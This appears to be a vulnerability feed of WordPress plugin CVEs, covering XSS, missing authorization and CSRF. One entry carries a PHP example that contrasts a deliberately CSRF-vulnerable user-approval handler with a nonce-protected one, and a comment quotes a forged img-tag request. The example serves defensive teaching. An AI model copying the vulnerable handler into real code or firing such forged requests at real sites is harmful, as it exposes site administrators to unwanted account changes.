Stored cross-site scripting (XSS) in Master Addons for Elementor through version 2.0.9.9.4 allows authenticated users with limited privileges to inject malicious scripts that execute in the browsers of other site visitors, potentially compromising administrator accounts or stealing sensitive data. The vulnerability requires user interaction (UI:R) and affects the plugin's input sanitization during web page generation. With an EPSS score of 0.04% and no confirmed active exploitation, this represents a lower real-world risk despite the moderate CVSS base score of 6.5.

WordPress PHP XSS
NVD
CVE-2025-63054
EPSS 0% CVSS 5.3
MEDIUM This Month

Missing authorization in ExpressTech Systems Quiz And Survey Master WordPress plugin through version 10.3.2 allows unauthenticated remote attackers to read sensitive quiz and survey data by exploiting incorrectly configured access control security levels. The vulnerability is assigned CVSS 5.3 (moderate), affects the plugin across multiple versions, and enables unauthorized information disclosure without requiring authentication or user interaction.

WordPress PHP Authentication Bypass
NVD
CVE-2025-63052
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored cross-site scripting (XSS) in SimpLy Gallery WordPress plugin (versions up to 3.3.2.1) allows authenticated users with low privileges to inject malicious scripts that execute in the browsers of other site visitors, potentially leading to session hijacking, credential theft, or site defacement. The vulnerability requires user interaction (UI:R) and affects confidentiality, integrity, and availability. No public exploit code or active exploitation has been confirmed; EPSS score of 0.04% indicates low real-world exploitation probability despite the moderate CVSS rating.

WordPress PHP XSS
NVD
CVE-2025-63033
EPSS 0% CVSS 5.9
MEDIUM This Month

Stored XSS in Make Section & Column Clickable For Elementor WordPress plugin (versions through 2.4) allows authenticated users with high privileges to inject malicious scripts that execute in other users' browsers. The vulnerability requires user interaction (UI:R) and affects site confidentiality, integrity, and availability with limited scope. EPSS score of 0.04% indicates low exploitation probability despite the presence of a public vulnerability disclosure.

WordPress PHP XSS
NVD
CVE-2025-63030
EPSS 0% CVSS 7.1
HIGH This Week

Cross-Site Request Forgery in WordPress New User Approve plugin (versions ≤3.2.3) enables unauthenticated remote attackers to trick authenticated administrators into executing unauthorized actions via crafted requests. With EPSS probability of 0.02% (5th percentile) and no evidence of active exploitation (not in CISA KEV), this represents a moderate real-world risk despite a CVSS 7.1 score. The vulnerability requires user interaction (UI:R) but no attacker privileges (PR:N), making it viable through social engineering tactics like phishing emails containing malicious links.

WordPress PHP CSRF
NVD
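
The New User Approve entry is the classic CSRF shape: a state-changing action an administrator can trigger by merely loading a URL, so an attacker's page can trigger it with the admin's cookies. The block below is an added example, not the plugin's code. The nonce scheme is a simplified model of WordPress's wp_create_nonce()/wp_verify_nonce() (HMAC over a time window, the action and the user, with the current and previous window accepted); the secret, lifetime, action name and pending-user list are constructed. It runs stand-alone with plain `php`.

```php
<?php
declare(strict_types=1);

const NONCE_SECRET = 'constructed-site-secret';   // WordPress derives its key from the wp-config.php salts
const NONCE_LIFE   = 12 * 3600;

function nonce_for(string $action, int $user_id, int $tick): string {
    return substr(hash_hmac('sha256', "$tick|$action|$user_id", NONCE_SECRET), -12, 10);
}
function create_nonce(string $action, int $user_id, int $now): string {
    return nonce_for($action, $user_id, (int) ceil($now / (NONCE_LIFE / 2)));
}
function verify_nonce(string $nonce, string $action, int $user_id, int $now): bool {
    $tick = (int) ceil($now / (NONCE_LIFE / 2));
    return hash_equals(nonce_for($action, $user_id, $tick), $nonce)
        || hash_equals(nonce_for($action, $user_id, $tick - 1), $nonce);
}

// Vulnerable: the capability check is present, but nothing proves the admin
// meant to send this request. A page the admin visits can embed
// <img src="https://site.example/wp-admin/users.php?approve=99"> and the
// browser attaches the admin's session cookies.
function approve_user_vulnerable(array $req, array $session, array &$pending): bool {
    if (!$session['can_edit_users']) {
        return false;
    }
    $id = (int) ($req['approve'] ?? 0);
    if (!isset($pending[$id])) {
        return false;
    }
    unset($pending[$id]);
    return true;
}

// Hardened: POST only, capability check, and a nonce bound to the acting user
// and to the specific account being approved. In WordPress this is
// wp_nonce_field() in the form and check_admin_referer() in the handler.
function approve_user(array $req, array $session, array &$pending, int $now): bool {
    if (($req['method'] ?? 'GET') !== 'POST' || !$session['can_edit_users']) {
        return false;
    }
    $id = (int) ($req['approve'] ?? 0);
    if (!verify_nonce((string) ($req['_wpnonce'] ?? ''), "nua_approve_$id", $session['user_id'], $now)) {
        return false;
    }
    if (!isset($pending[$id])) {
        return false;
    }
    unset($pending[$id]);
    return true;
}

// Constructed scenario.
$now     = time();
$admin   = ['user_id' => 1, 'can_edit_users' => true];
$pending = [99 => 'attacker@example.invalid'];

// Cross-site request: cookies are sent, but the attacker's page cannot read the nonce.
$forged = ['method' => 'GET', 'approve' => 99];
$p = $pending;
var_dump(approve_user_vulnerable($forged, $admin, $p));
$p = $pending;
var_dump(approve_user($forged, $admin, $p, $now));

// The plugin's own form carries the nonce rendered for this admin and this user id.
$legit = ['method' => 'POST', 'approve' => 99, '_wpnonce' => create_nonce('nua_approve_99', 1, $now)];
$p = $pending;
var_dump(approve_user($legit, $admin, $p, $now));

// A nonce minted for a different target account does not transfer.
$wrong = $legit;
$wrong['_wpnonce'] = create_nonce('nua_approve_42', 1, $now);
$p = $pending;
var_dump(approve_user($wrong, $admin, $p, $now));
```

Binding the nonce to the object id is what WordPress core does for its own actions (for example 'delete-user_' . $id); a single site-wide nonce for "approve any user" would still stop the cross-site case but lets a nonce obtained for one account be replayed against another.
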
CVE-2025-63025
EPSS 0% CVSS 4.3
MEDIUM This Month

Xagio SEO WordPress plugin through version 7.1.0.35 contains a missing authorization vulnerability that allows authenticated users to perform unauthorized actions due to incorrectly configured access control security levels. The vulnerability has a CVSS score of 4.3 with low real-world exploitation probability (EPSS 0.04%), affecting authenticated users who can bypass intended access restrictions to modify plugin functionality or settings.

WordPress PHP Authentication Bypass
NVD
CVE-2025-63023
EPSS 0% CVSS 5.3
MEDIUM This Month

Missing authorization in Easy Payment Payment Gateway for PayPal (woo-paypal-gateway) WordPress plugin versions up to 9.0.53 allows unauthenticated remote attackers to access sensitive payment gateway data through improper access control configuration. The vulnerability enables unauthorized information disclosure with low confidentiality impact. EPSS score of 0.04% indicates minimal observed exploitation probability despite network accessibility and no authentication requirement.

WordPress Woocommerce PHP +1
NVD
CVE-2025-63015
EPSS 0% CVSS 4.3
MEDIUM This Month

Paysera WooCommerce Payment Gateway plugin through version 3.10.0 contains a missing authorization flaw allowing authenticated users with lower privilege levels to access or perform actions intended for higher-privilege roles, resulting in limited information disclosure. The vulnerability stems from incorrectly configured access control checks and has an EPSS score of 0.04% (11th percentile), indicating low real-world exploitation probability despite the CVSS 4.3 rating and authenticated attack vector.

WordPress Woocommerce PHP +1
NVD